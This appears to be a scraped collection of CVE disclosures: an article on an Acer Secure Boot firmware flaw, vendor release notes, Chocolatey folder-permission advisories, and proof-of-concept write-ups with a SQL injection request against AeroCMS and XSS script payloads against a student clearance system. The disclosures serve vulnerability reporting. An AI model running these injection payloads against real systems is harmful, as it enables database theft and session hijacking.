The manufacturer is working to fix a vulnerability — similar to a previous problem in Lenovo laptops — that allows threat actors to modify or disable Secure Boot settings to load malware.

Acer is working to fix a firmware flaw affecting five of its laptop models. An exploit could allow attackers to disable a machine's Secure Boot settings to bypass key security measures and load malware, researchers have found.

ESET Research researcher Martin Smolar discovered the flaw, tracked as CVE-2022-4020, in the HQSwSmiDxe DXE driver on some versions of consumer Acer Aspire and Extensa notebooks. An attacker with elevated privileges can use the flaw to modify UEFI Secure Boot settings via an NVRAM variable, ESET disclosed in a series of tweets posted Nov. 28.

"#CVE-2022-4020 is found in the DXE driver HQSwSmiDxe, which checks for the 'BootOrderSecureBootDisable' NVRAM variable," according to ESET. "If the variable exists, the driver disables Secure Boot."

Secure Boot is a security feature of the Unified Extensible Firmware Interface (UEFI) 2.3.1 designed to detect tampering with boot loaders, OS files, and unauthorized option ROMs by validating their digital signatures. The feature blocks any malicious activity before it can infect the system.

By exploiting the flaw, threat actors can bypass this feature and run whatever code they want on the machine, malware or otherwise, even achieving persistence in a case in which an OS is reinstalled, the researchers said.

**Different Manufacturer, Similar Security Vulnerability**

Specifically, CVE-2020-4020 affects Acer Aspire A315-22, A115-21, and A315-22G, and Extensa EX215-21 and EX215-21G notebooks. The flaw creates a similar opportunity for attackers to the one caused by vulnerabilities tracked as CVE-2022-3430, CVE-2022-3431, and CVE-2022-3432 that ESET researchers found in early November in various Lenovo Yoga IdeaPad and ThinkBook devices, and subsequently detailed extensively in a series of tweets.

As in that case, ESET also reported the vulnerability to the computer manufacturer for remediation. Acer quickly responded on Nov. 29 with a security update corroborating Smolar's findings and stressing the serious nature of the flaw.

"By disabling the Secure Boot feature, an attacker can load their own unsigned malicious bootloader to allow absolute control over the OS loading process," the company said. "This can allow them to disable or bypass protections to silently deploy their own payloads with the system privileges."

Acer is working on a BIOS update to resolve the issue that it will post on the Acer Support site, and recommends that affected users update their BIOS, once available, to the latest version to resolve the problem. The patch also will be included as a critical Windows update, the company said.

**Common NVRAM Variable Problem**

In both the Lenovo and Acer scenarios, attackers can exploit the Acer bug by creating special NVRAM variables, the actual value of which is not important—the existence of the variable itself is the only thing an affected firmware driver checks, the researchers noted.

NVRAM variables define a name for the boot option that can be displayed to a user. The variable also contains a pointer to the hardware device and to a file on that hardware device that contains the UEFI image to be loaded.

This problem appears to be quite well known, with researchers already advising against firmware developers storing security-sensitive components in these variables. Firmware security engineer Nikolaj Schlej even tweeted a plea to firmware developers in October to "stop using common NVRAM as trusted storage" because of the security problem it poses.

"It is indeed really tempting to use NVRAM or CMOS SRAM for storing triggers for various things, but both need to be assumed being under full attacker control," he said in a response to his own tweet. "Even volatile NVRAM variables aren't completely safe because there is still a chance of incorrect attribute check."

In the case of the Lenovo flaws, it does appear that developers already were aware of the issue before it made its way into the company's laptops, as some of the affected components were only meant to be used during manufacturing and were mistakenly included in production, according to ESET.

Acer Firmware Flaw Lets Attackers Bypass Key Security Feature

AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the Search parameter. This vulnerability allows attackers to access database information.

**Step to Reproduct**

*   The search parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Exploit**

Query out the current user

**Vulnerable Code**

The search parameter is passed in the POST mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    "SELECT * FROM posts WHERE post_tags LIKE '%a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q%'"
    

**POC**

*   Injection Point

    search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q
    

*   Request

    POST /AeroCMS-0.0.1/search.php HTTP/1.1
    Host: localhost
    Content-Length: 31
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://localhost/AeroCMS-0.0.1/post.php?p_id=1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=ffopa5dean7sk0fe55kc93e163
    Connection: close
    
    search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q&submit=

CVE-2022-45329: CVE/search_sql_injection.md at master · rdyx0/CVE

Insecure permissions in Chocolatey PHP package v8.1.12 and below grants all users in the Authenticated Users group write privileges for the subfolder C:\tools\php81 and all files located in that folder.

**Incorrect default permission of php if installed by chocolatey****Basic Info**

Description：If we use chocolaty to install php in windows System.The default install dir of php is C:\\tools\\php81, howerver, the permission of C:\\tools\\php81 is inherited from C:, so all Users in Authenticated Users group have write permission of path C:\\tools\\php81 and files in it.

Vuln Type: CWE-276

Website: https://community.chocolatey.org/packages/php

Install Command : choco install php --version=8.1.12

Vuln Version: php 8.1.12 and below

**Vuln Analyse**

*   Use chocolatey to install php in Windows system

*   We can see that All Users in Authenticated Users group have write permission of C:\\tools\\php81 and files in it.

So an attacker with low privilege can hijack binary like C:\\tools\\php81\\php.exe to execute arbitrary code when administrator or other users use php installed by chocolatey.

CVE-2022-45307: Vuln/php-weak-permission-vuln.md at main · ycdxsb/Vuln

Insecure permissions in Chocolatey Azure-Pipelines-Agent package v2.211.1 and below grants all users in the Authenticated Users group write privileges for the subfolder C:\agent and all files located in that folder.

**Incorrect default permission of Azure-piplines-agent if installed by chocolatey****Basic Info**

Description：If we use chocolaty to install azure-pipelines-agent in windows System.The default install dir of azure-pipelines-agent is C:\\agent howerver, the permission of C:\\agent is inherited from C:, so all Users in Authenticated Users group have write permission of path C:\\agent and files in it.

Vuln Type: CWE-276

Website:https://community.chocolatey.org/packages/azure-pipelines-agent

Install Command : choco install azure-pipelines-agent --version=2.211.1

Vuln Version: azure-pipelines-agent version 2.211.1 and below

**Vuln Analyse**

*   Use chocolatey to install azure-pipelines-agent in Windows system

*   We can see that All Users in Authenticated Users group have write permission of C:\\agent and files in it.

So an attacker with low privilege can hijack binary like C:\\agent\\bin\\AgentService.exe to execute arbitrary code when administrator or other users use azure-pipelines-agent installed by chocolatey.

CVE-2022-45306: Vuln/azure-pipelines-agent-weak-permission-vuln.md at main · ycdxsb/Vuln

Insecure permissions in Chocolatey Python3 package v3.11.0 and below grants all users in the Authenticated Users group write privileges for the subfolder C:\Python311 and all files located in that folder.

**Incorrect default permission of python3 if installed by chocolatey****Basic Info**

Description：If we use chocolaty to install python3 in windows System.The default install dir of python3 is C:\\python311 , howerver, the permission of C:\\Python311 is inherited from C:, so all Users in Authenticated Users group have write permission of subfolder of C:\\Python311 and files in it.

Vuln Type: CWE-276

Website:https://community.chocolatey.org/packages/python3

Install Command : choco install python3 --version=3.11.0

Vuln Version: python3 3.11.0 and below

**Vuln Analyse**

*   Use chocolatey to install python3 in Windows system

*   We can see that All Users in Authenticated Users group have write permission of subfolder of C:\\Python311 (example : C:\\Python311\\libs and C:\\Python311\\DLLs) and files in it.

So an attacker with low privilege can hijack binary like C:\\Python311\\python.exe to execute arbitrary code when administrator or other users use python3 installed by chocolatey.

CVE-2022-45305: Vuln/python3-weak-permission-vuln.md at main · ycdxsb/Vuln

Insecure permissions in Chocolatey Cmder package v1.3.20 and below grants all users in the Authenticated Users group write privileges for the path C:\tools\Cmder and all files located in that folder.

**Incorrect default permission of Cmder if installed by chocolatey****Basic Info**

Description：If we use chocolaty to install cmder in windows System.The default install dir of cmder is C:\\tools\\Cmder, howerver, the permission of C:\\tools\\Cmder is inherited from C:, so all Users in Authenticated Users group have write permission of path C:\\tools\\Cmder and files in it.

Vuln Type: CWE-276

Website: https://community.chocolatey.org/packages/cmder

Install Command : choco install cmder --version=1.3.20

Vuln Version: cmder 1.3.20 and below

**Vuln Analyse**

*   Use chocolatey to install Cmder in Windows system

*   We can see that All Users in Authenticated Users group have write permission of C:\\tools\\Cmder and files in it.

So an attacker with low privilege can hijack binary likeC:\\tools\\Cmder\\Cmder.exe to execute arbitrary code when administrator or other users use cmder installed by chocolatey.

CVE-2022-45304: Vuln/cmder-weak-permission-vuln.md at main · ycdxsb/Vuln

Insecure permissions in Chocolatey Ruby package v3.1.2.1 and below grants all users in the Authenticated Users group write privileges for the path C:\tools\ruby31 and all files located in that folder.

**Incorrect default permission of ruby if installed by chocolatey****Basic Info**

Description：If we use chocolaty to install ruby in windows System.The default install dir of ruby is C:\\tools\\ruby31, howerver, the permission of C:\\tools\\ruby31 is inherited from C:, so all Users in Authenticated Users group have write permission of path C:\\tools\\ruby31 and files in it.

Vuln Type: CWE-276

Website: https://community.chocolatey.org/packages/ruby

Install Command : choco install ruby --version=3.1.2.1

Vuln Version: ruby 3.1.2.1 and below

**Vuln Analyse**

*   Use chocolatey to install ruby in Windows system

*   We can see that All Users in Authenticated Users group have write permission of C:\\tools\\ruby31 and files in it.

So an attacker with low privilege can hijack binary likeC:\\tools\\ruby31\\ruby.exe to execute arbitrary code when administrator or other users use ruby installed by chocolatey.

CVE-2022-45301: Vuln/ruby-weak-permission-vuln.md at main · ycdxsb/Vuln

This update resolves a multi-factor authentication bypass attack

This release includes the following software fixes:

Component

Description

Administration Portal

The data and graphs displayed on the Dashboard are not up to date. The data and graph are displayed until the date when the settings are last saved. However, the data gets updated when the administrator manually updates the .

Administration Portal

Specifying color in the RGB format or keeping the following fields empty in the policy results in an error message:

Therefore, you must set the colors in the Hexadecimal format.

Administration Portal

The column is removed from the widget of Dashboard, as it does not provide clear details about the expiry status of a specific license and causes confusion.

Administration Portal

The full synchronization process marks several active users for deletion. Due to this issue, active users cannot log in. This issue occurs after upgrading to Advanced Authentication 6.3 Service Pack 4 Patch 1 release.

Administration Portal

Use of special characters in the ClientID and Secret of OAuth events causes the Web Authentication parsing error.

Administration Portal

The customized brand settings break after upgrading to Advanced Authentication 6.4. This issue occurs due to the missing custom branding JAR file.

Administration Portal

Implementing the Per Tenant Hostname (PTH) feature breaks the Web Authentication method.

Administration Portal

The administrator is unable to remove the LDAP repository when the LDAP server is unavailable. The following error message is displayed:

Cannot connect to the LDAP server

Administration Portal

The existing OAuth integrations fail after the upgrade to Advanced Authentication 6.4.

Administration Portal

When the name and number of a particular Server Metric tile are too long, then the content that is extending outside the tile is wrapped that misaligns the tile position.

Administration Portal

On the Linux PAM Client, the is not formatted properly.

Appliance

Deleting the reports from the Administration Portal does not delete the exported reports (CSV and JSON) in the /var/lib/docker/volumes/aaf\_aucore-data/\_data/reports path even after rebooting the appliance.

Appliance

The upgrade of Web Servers to Advanced Authentication 6.4 fail in the cluster environment.

CAF Portal

The upgrade to Advanced Authentication 6.4 fails if the connection is via proxy.

CAF Portal

In Advanced Authentication 6.4, exporting of the Digital Certificate results in an error.

Enrollment Portal

After integrating Advanced Authentication with Access Manager using the SAML event, the redirection from Access Manager to the Enrollment Portal fails and results in a 404 error. This happens due to the missing text webauth/ in the Callback URL.

Enrollment Portal

The enrollment of the Web Authentication Method fails even when the administrator has configured the method with valid details.

Linux PAM Client

When a user selects an authentication chain with the Fingerprint method on the Linux PAM client, an error message Invalid access: cannot convert empty value is displayed.

Now, if the Fingerprint reader is not connected to the Linux machine and user attempts to log in, the authentication chain with the Fingerprint method is not displayed.

OAuth and SAML Events

The SAML Service Provider method with improper configuration bypasses authentication and grants access without any validation to the associated OAuth and SAML events.

Old Enrollment Portal

On the old Enrollment Portal, enrollment of the U2F method fails when using the Chrome browser.

SAML Event

When Advanced Authentication and Cisco AnyConnect are integrated using the SAML event, the login page is not displayed appropriately.

Web Authentication

With one Web Authentication event active for a user and the user tries to log in to another Web Authentication event, an error message stating to log out from the previous event is displayed.

Web Authentication

An authentication attempt to the Web Authentication event fails if the is set with RGB values in the policy. This occurs due to the use of transparent colors. Therefore, administrators must set the colors in the Hexadecimal format.

Windows Client

When users try to authenticate to Windows Client using the FIDO2 method with NFC capability, an invalid error message Please connect a FIDO2 token is displayed though the reader is connected to the system.

Windows Client

An invalid error message is displayed when a user removes the NFC-supported card from the card reader while authenticating to Windows Client using the Card method.

Now, the following message is displayed when the user removes NFC supported card from the reader during authentication:

Tap your security key again on the reader

CVE-2022-38753: Advanced Authentication 6.4 Service Pack 1 Release Notes

April 2021

Advanced Authentication 6.3 Service Pack 4 Patch 1 includes enhancements and resolves several previous issues.

Many of these improvements were made in direct response to suggestions from our customers. We thank you for your time and valuable input. We hope you continue to help us ensure that our products meet all your needs. You can post feedback in the Advanced Authentication forum on NetIQ Communities, our online community that also includes product information, blogs, and links to helpful resources. You can also post or vote the ideas of enhancement requests in the Ideas forum.

For more information about this release and for the latest release notes, see the Documentation NetIQ Advanced Authentication Documentation page.

If you have suggestions for documentation improvements, click at the bottom of the specific page in the HTML version of the documentation posted at the NetIQ Advanced Authentication Documentation page.

**1.0 What’s New?**

Advanced Authentication 6.3 Service Pack 4 Patch 1 includes the following:

*   Enhancements
    
*   Security Improvements
    
*   Software Fixes
    

**1.1 Enhancements**

This release includes the following enhancements:

Enhancement

Description

Settings to Retrieve User Groups after Authentication

The options, and are introduced in all events (existing and new events). These options allow an administrator to retrieve the list of groups a user is associated with after successfully authenticating to an event.

_NOTE:_The is enabled by default for all the events except the Authenticators Management, Smartphone Enrollment, OAuth 2.0, and SAML 2.0 events.

For more information, see Configuring an Existing Event in the Advanced Authentication - Administration guide.

Improved REST API Call to Return the DNS Name

The REST API call /api/v1/repositories has been enhanced to return the DNS name of each repository along with the repository name and repository type.

**1.2 Security Improvements**

Advanced Authentication 6.3 Service Pack 4 Patch 1 resolves a potential Multi-Factor Authentication (MFA) downgrade issue (CVE-2021-22515).

We would like to offer a special thanks to Julkair for responsibly disclosing this issue.

**1.3 Software Fixes**

This release includes the following fixes:

Component

Description

Enrollment Portal

The option for the SMS OTP and Email OTP methods is not available in the old Enrollment portal.

Enrollment Portal

When a user logs in to the old Enrollment portal by performing the basic authentication and tries to enroll the TOTP method, the QR code is not displayed.

Enrollment Portal

When a user connects the Spanish national identity card (Documento Nacional de identidad) and tries to enroll it using the PKI method, the certificate is not displayed in the field.

However, on click of , certificates are displayed. When the user selects a certificate, the following error message is displayed:

Cannot check the revocation status.

RADIUS

The RADIUS server does not return the msRADIUSFramedIPAddress attribute if the hexadecimal value of that attribute contains a negative value.

Web Authentication

When the users from LDAP repositories try to log in to the Enrollment Portal, the following error message is displayed:

WebAuth feature is not running.

This issue happens only for LDAP users who are associated with many groups and many nested groups. The local users can log in without any problem.

**2.0 Known Issues**

NetIQ Corporation strives to ensure our products provide quality solutions for your enterprise software needs. The following issues are currently being researched. If you need further assistance with any issue, please contact Technical Support.

Advanced Authentication 6.3 Service Pack 4 Patch 1 includes the following known issue:

*   Windows Client Does Not Respond
    
*   Syslog is Flooded with the Health Check Messages
    
*   Issue with Risk Service After Upgrade
    

**2.1 Windows Client Does Not Respond**

When a user tries to authenticate to Windows Client, it freezes in the Please wait screen after providing the username. This happens only in Windows machines with external Nvidia Quadro graphics cards and their drivers installed.

**2.2 Syslog is Flooded with the Health Check Messages**

There are various messages as follows:

dockerd\[2167\]: time="2020-12-21T23:30:22.663706880Z" level=warning msg="Health check for container b1cc02cc52d3fe2681c9fa60abfab62aa54fa40d4d833fca4bb0fef5d0414890 error: context deadline exceeded" in syslog.

These messages do not indicate any issues. This is due to the absence of the Risk Service license.

_Workaround:_ Perform the following steps:

1.  Log in to the Configuration Portal (:9443).
    
2.  Click and select the Risk Service then click and select .
    
3.  Click then select for Risk Service.
    

**2.3 Issue with Risk Service After Upgrade**

_Issue:_ The Risk Service does not work after upgrading to Advanced Authentication 6.3 SP4.

_Workaround:_ Run the following commands to remove the old rba\_history container and reboot the appliance:

1.  systemctl stop docker
    
2.  systemctl start docker
    
3.  docker container stop risk\_rbahistory\_1
    
4.  docker container rm risk\_rbahistory\_1
    
5.  docker rmi -f mfsecurity/rba\_history:1.0.0.2
    
6.  reboot
    
7.  Log in to the Administration portal and click > to clear the logs.
    

_NOTE:_If any command takes too long to respond or hangs, press Ctrl+C to stop and continue with the next step.

**4.0 Contact Information**

Our goal is to provide documentation that meets your needs. If you have suggestions for improvements, please email Documentation-Feedback@netiq.com. We value your input and look forward to hearing from you.

For detailed contact information, see the Support Contact Information website.

For general corporate and product information, see the NetIQ Corporate website.

For interactive conversations with your peers and NetIQ experts, become an active member of our community. The NetIQ online community provides product information, useful links to helpful resources, blogs, and social media channels.

**5.0 Legal Notice**

For information about legal notices, trademarks, disclaimers, warranties, export and other use restrictions, U.S. Government rights, patent policy, and FIPS compliance, see http://www.microfocus.com/about/legal/.

© Copyright 2021 NetIQ Corporation, a Micro Focus company. All Rights Reserved.

CVE-2022-38753: Advanced Authentication 6.3 Service Pack 4 Patch 1 Release Notes

Web-Based Student Clearance System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /Admin/add-student.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the txtfullname parameter.

**1\. /changepassword.php**

txtold\_password、txtnew\_password、txtconfirm\_password

**payload:**

**txtold\_password="><script>alert(1)</script><"**

**poc:**

POST /changepassword.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 45  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/changepassword.php  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtold\_password="><script>alert(1)</script><"

**2\. **/Admin/changepassword.php****

txtold\_password、txtnew\_password、txtconfirm\_password

**payload:**

**txtold\_password="><script>alert(1)</script><"**

POC:

POST /admin/changepassword.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 45  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/admin/index.php  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtold\_password="><script>alert(1)</script><"

****3./Admin/add-admin.php****

txtusername

**payload:**

txtusername="><script>alert(1)</script><"

**poc:**

POST /Admin/add-admin.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 41  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/Admin/add-admin.php  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtusername="><script>alert(1)</script><"

****4./Admin/add-student.php****

**txtfullname**

POST /Admin/add-student.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 63  
Origin: http://localhost  
Connection: close  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtfullname="><script>alert(1)</script><"

Reference:

https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html

Tag

#windows